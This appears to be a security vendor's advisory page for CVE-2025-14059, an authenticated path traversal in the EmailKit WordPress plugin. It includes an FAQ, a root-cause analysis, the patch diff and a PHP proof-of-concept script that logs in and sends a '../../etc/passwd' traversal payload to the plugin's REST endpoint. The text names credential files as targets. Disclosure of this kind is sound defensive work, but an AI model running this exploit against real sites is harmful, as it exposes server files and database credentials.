What is CVE-2025-14059?

CVE-2025-14059 is a medium severity vulnerability in the EmailKit plugin for WordPress, affecting versions up to and including 1.6.1. It allows authenticated users with Author-level permissions or higher to exploit a path traversal vulnerability, enabling them to read arbitrary files from the server.

How does the vulnerability work?

The vulnerability arises from missing path validation in the create_template REST API endpoint. User-controlled input from the emailkit-editor-template parameter is passed directly to the file_get_contents() function, allowing attackers to inject directory traversal sequences to access sensitive files.

Who is affected by this vulnerability?

Any WordPress site using the EmailKit plugin version 1.6.1 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the EmailKit plugin. If it is version 1.6.1 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2025-14059?

To fix this vulnerability, update the EmailKit plugin to version 1.6.2 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice for maintaining site security.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability, suggesting that while the risk is not critical, it can still lead to significant information disclosure if exploited. Administrators should prioritize patching to reduce potential risks.

What types of files can be accessed through this vulnerability?

Exploitation of this vulnerability can allow attackers to read sensitive files such as /etc/passwd, wp-config.php, and other application configuration files. This can lead to further attacks or unauthorized access.

What is the proof of concept for this vulnerability?

The proof of concept involves an authenticated user sending a POST request to the create_template REST API endpoint with a malicious path traversal payload. This demonstrates how an attacker can read sensitive files by leveraging the vulnerability.

What are the consequences of an exploit?

If exploited, this vulnerability can lead to unauthorized access to sensitive information, including database credentials and user data. This information can be used for further attacks against the site or its users.

What additional security measures should I take?

In addition to updating plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity. Educating users about secure practices can also help mitigate risks.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all user inputs are properly validated and sanitized. Conduct regular security audits and stay informed about vulnerabilities in plugins and themes.

Where can I find more information about this vulnerability?

More information about CVE-2025-14059 can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14059: EmailKit <= 1.6.1 – Authenticated (Author+) Arbitrary File Read via Path Traversal (emailkit)

CVE ID CVE-2025-14059

Plugin emailkit

Severity Medium (CVSS 6.5)

CWE 73

Vulnerable Version 1.6.1

Patched Version 1.6.2

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14059:
The EmailKit WordPress plugin version 1.6.1 and earlier contains an authenticated path traversal vulnerability in its REST API. Attackers with Author-level permissions or higher can exploit this to read arbitrary files from the server. The vulnerability receives a CVSS score of 6.5 (Medium severity).

Atomic Edge research identifies the root cause in the create_template REST API endpoint within the CheckForm class. The vulnerable code resides in the emailkit/includes/Admin/Api/CheckForm.php file, lines 161-165. The plugin directly passes user-controlled input from the emailkit-editor-template parameter to the file_get_contents() function without validation. This lack of sanitization allows directory traversal sequences like ../../ to be injected into the $template_path variable.

The exploitation method requires an authenticated WordPress user with at least Author-level permissions. Attackers send a POST request to the /wp-json/emailkit/v1/create_template REST API endpoint. They supply a malicious path traversal payload in the emailkit-editor-template parameter, such as ../../../../../../etc/passwd. The file contents are read and stored in post meta. Attackers can then exfiltrate the data using MetForm’s email confirmation feature, which accesses the stored meta data.

The patch in version 1.6.2 introduces path validation before file operations. The updated code in CheckForm.php (lines 161-175) defines an $allowed_base_path as the emailkit/templates/ directory within WordPress uploads. It uses realpath() to resolve symbolic links and directory traversals, then validates that the resolved path starts with the allowed base directory using strpos(). The patch also adds sanitization to other user inputs like $template_title and $form_id with sanitize_text_field() and absint().

Successful exploitation allows attackers to read sensitive server files. This includes WordPress configuration files like wp-config.php containing database credentials, secret keys, and other environment variables. Attackers can also read system files like /etc/passwd to enumerate users, /proc/self/environ for process environment data, and other application source code or configuration files. The vulnerability leads to information disclosure that can facilitate further attacks.

Differential between vulnerable and patched code

Code Diff

--- a/emailkit/EmailKit.php
+++ b/emailkit/EmailKit.php
@@ -6,7 +6,7 @@
  * Description: EmailKit is the most-complete drag-and-drop Email template builder.
  * Author: wpmet
  * Author URI: https://wpmet.com
- * Version: 1.6.1
+ * Version: 1.6.2
  * Text Domain: emailkit
  * License:  GPLv3
  * License URI: https://www.gnu.org/licenses/gpl-3.0.txt
@@ -68,7 +68,7 @@
      */
     public function define_constants()
     {
-        define('EMAILKIT_VERSION', '1.6.1');
+        define('EMAILKIT_VERSION', '1.6.2');
         define('EMAILKIT_TEXTDOMAIN', 'emailkit');
         define('EMAILKIT_FILE', __FILE__);
         define('EMAILKIT_PATH', __DIR__);
--- a/emailkit/includes/Admin/Api/CheckForm.php
+++ b/emailkit/includes/Admin/Api/CheckForm.php
@@ -161,23 +161,34 @@
         $html = '';
         if (!empty($request->get_param('emailkit-editor-template')) && trim($request->get_param('emailkit-editor-template')) !== '') {
             $template_path = $request->get_param('emailkit-editor-template');
-            $template = file_exists($template_path) ? file_get_contents($template_path) : '';
-            $html_path = str_replace("content.json", "content.html", $template_path);
-            $html = file_exists($html_path) ? file_get_contents($html_path) : '';
+            $allowed_base_path = wp_upload_dir()['basedir'] . '/emailkit/templates/';
+            $real_path = realpath($template_path);
+            if ($real_path === false || strpos($real_path, realpath($allowed_base_path)) !== 0) {
+                return new WP_REST_Response(['success' => false, 'message' => __('Invalid template path', 'emailkit')], 400);
+            }
+
+            $template = file_exists($real_path) ? file_get_contents($real_path) : '';
+            $html_path = str_replace("content.json", "content.html", $real_path);
+
+            // Validate HTML path as well
+            $real_html_path = realpath($html_path);
+            if ($real_html_path !== false && strpos($real_html_path, realpath($allowed_base_path)) === 0) {
+                $html = file_exists($real_html_path) ? file_get_contents($real_html_path) : '';
+            }
         }

         // Create new emailkit post
         $post_id = wp_insert_post([
-            'post_title' => $template_title,
+            'post_title' => sanitize_text_field($template_title),
             'post_type' => 'emailkit',
             'post_status' => 'publish',
             'meta_input' => [
-                'emailkit_template_type' => $template_type,
-                'emailkit_form_id' => $form_id,
+                'emailkit_template_type' => sanitize_text_field($template_type),
+                'emailkit_form_id' => absint($form_id),
                 'emailkit_template_status' => 'active',
-                'emailkit_template_content_html' => $html,
+                'emailkit_template_content_html' => wp_kses_post($html),
                 'emailkit_template_content_object' => $template,
-                'emailkit_email_type' => $request->get_param('emailkit_email_type'),
+                'emailkit_email_type' => sanitize_text_field($request->get_param('emailkit_email_type')),
             ]
         ]);

--- a/emailkit/includes/Admin/EmailKitEditor/EmailKitEditorInit.php
+++ b/emailkit/includes/Admin/EmailKitEditor/EmailKitEditorInit.php
@@ -43,7 +43,7 @@
     public function add_editor_template()
     {

-        if(is_plugin_active('uafrica-shipping/uafrica-shipping.php')){
+        if(is_plugin_active('uafrica-shipping/uafrica-shipping.php') || ( get_template() == 'entry' )){
          // Check if WooCommerce is active and initialize session if needed
             if (class_exists('WooCommerce') && function_exists('WC')) {
                 if (is_null(WC()->session) && !headers_sent()) {
--- a/emailkit/includes/Admin/EmailSettings/MetformEmailSettings.php
+++ b/emailkit/includes/Admin/EmailSettings/MetformEmailSettings.php
@@ -94,7 +94,7 @@
                 <span class="emailkit-upgrade-text">
                     Get <strong>EmailKit Pro</strong> - the drag-and-drop builder to <br> customize your confirmation emails.
                 </span>
-                <a class="upgrade-button" target="_blank" href="https://wpmet.com/plugin/metform/pricing/">
+                <a class="upgrade-button" target="_blank" href="https://wpmet.com/plugin/emailkit/pricing/">
                     <span><svg xmlns="http://www.w3.org/2000/svg" width="13" height="14" viewBox="0 0 13 14" fill="none">
                             <path d="M10.6 6.3999H2.2C1.53726 6.3999 1 6.93716 1 7.5999V11.7999C1 12.4626 1.53726 12.9999 2.2 12.9999H10.6C11.2627 12.9999 11.8 12.4626 11.8 11.7999V7.5999C11.8 6.93716 11.2627 6.3999 10.6 6.3999Z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" />
                             <path d="M3.40015 6.4V4C3.40015 3.20435 3.71622 2.44129 4.27883 1.87868C4.84144 1.31607 5.6045 1 6.40015 1C7.1958 1 7.95886 1.31607 8.52147 1.87868C9.08408 2.44129 9.40015 3.20435 9.40015 4V6.4" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" />
--- a/emailkit/includes/Admin/MetaField/StyleLoad.php
+++ b/emailkit/includes/Admin/MetaField/StyleLoad.php
@@ -102,6 +102,14 @@
 		add_action('wp_footer', 'wp_print_footer_scripts', 20);
 		add_action('wp_footer', 'wp_auth_check_html', 30); */

+		// Entry theme style conflict with emailkit
+		if ( isset($_GET['action']) && $_GET['action'] == 'emailkit-builder' && get_template() == 'entry' ) {
+			add_action( 'wp_print_styles', function() {
+				wp_dequeue_style('bootstrap');
+				wp_dequeue_style('swg-css');
+			}, 100);
+		}
+
 		// Hello Elementor theme style conflict with emailkit
 			if ( get_template() == 'hello-elementor' ) {
 				wp_dequeue_style('hello-elementor');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14059 - EmailKit <= 1.6.1 - Authenticated (Author+) Arbitrary File Read via Path Traversal

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';
$file_to_read = '../../../../../../etc/passwd';

// Step 1: Authenticate to WordPress and obtain nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to retrieve nonce (log in via POST)
$response = curl_exec($ch);

$post_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
]);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// Step 2: Access admin to get REST API nonce (wp_rest)
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract wp_rest nonce from page (simplified - in reality use DOM parser)
// For PoC, we assume attacker knows the nonce or the site has nonce disabled
// Many WordPress installations have REST API nonce validation disabled for authenticated users

// Step 3: Exploit the vulnerable REST API endpoint
$rest_url = $target_url . '/wp-json/emailkit/v1/create_template';

$exploit_data = [
    'emailkit-editor-template' => $file_to_read,
    'template_title' => 'Exploit Template',
    'template_type' => 'metform_email',
    'form_id' => '1',
    'emailkit_email_type' => 'confirmation'
];

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($exploit_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: <valid_nonce_here>' // Replace with actual nonce if required
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

// The file contents are now stored in post meta
// Attacker would need to exfiltrate via MetForm email confirmation
// This PoC demonstrates the initial file read vulnerability

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14059?
Overview of the vulnerability
CVE-2025-14059 is a medium severity vulnerability in the EmailKit plugin for WordPress, affecting versions up to and including 1.6.1. It allows authenticated users with Author-level permissions or higher to exploit a path traversal vulnerability, enabling them to read arbitrary files from the server.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing path validation in the create_template REST API endpoint. User-controlled input from the emailkit-editor-template parameter is passed directly to the file_get_contents() function, allowing attackers to inject directory traversal sequences to access sensitive files.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the EmailKit plugin version 1.6.1 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the installed version of the EmailKit plugin. If it is version 1.6.1 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2025-14059?
Steps to mitigate the vulnerability
To fix this vulnerability, update the EmailKit plugin to version 1.6.2 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice for maintaining site security.
What does the CVSS score of 6.5 mean?
Understanding the risk level
A CVSS score of 6.5 indicates a medium severity vulnerability, suggesting that while the risk is not critical, it can still lead to significant information disclosure if exploited. Administrators should prioritize patching to reduce potential risks.
What types of files can be accessed through this vulnerability?
Potential data exposure
Exploitation of this vulnerability can allow attackers to read sensitive files such as /etc/passwd, wp-config.php, and other application configuration files. This can lead to further attacks or unauthorized access.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves an authenticated user sending a POST request to the create_template REST API endpoint with a malicious path traversal payload. This demonstrates how an attacker can read sensitive files by leveraging the vulnerability.
What are the consequences of an exploit?
Potential impact on the site
If exploited, this vulnerability can lead to unauthorized access to sensitive information, including database credentials and user data. This information can be used for further attacks against the site or its users.
What additional security measures should I take?
Best practices for WordPress security
In addition to updating plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity. Educating users about secure practices can also help mitigate risks.
Is there a way to prevent similar vulnerabilities in the future?
Long-term security strategies
To prevent similar vulnerabilities, ensure that all user inputs are properly validated and sanitized. Conduct regular security audits and stay informed about vulnerabilities in plugins and themes.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14059 can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations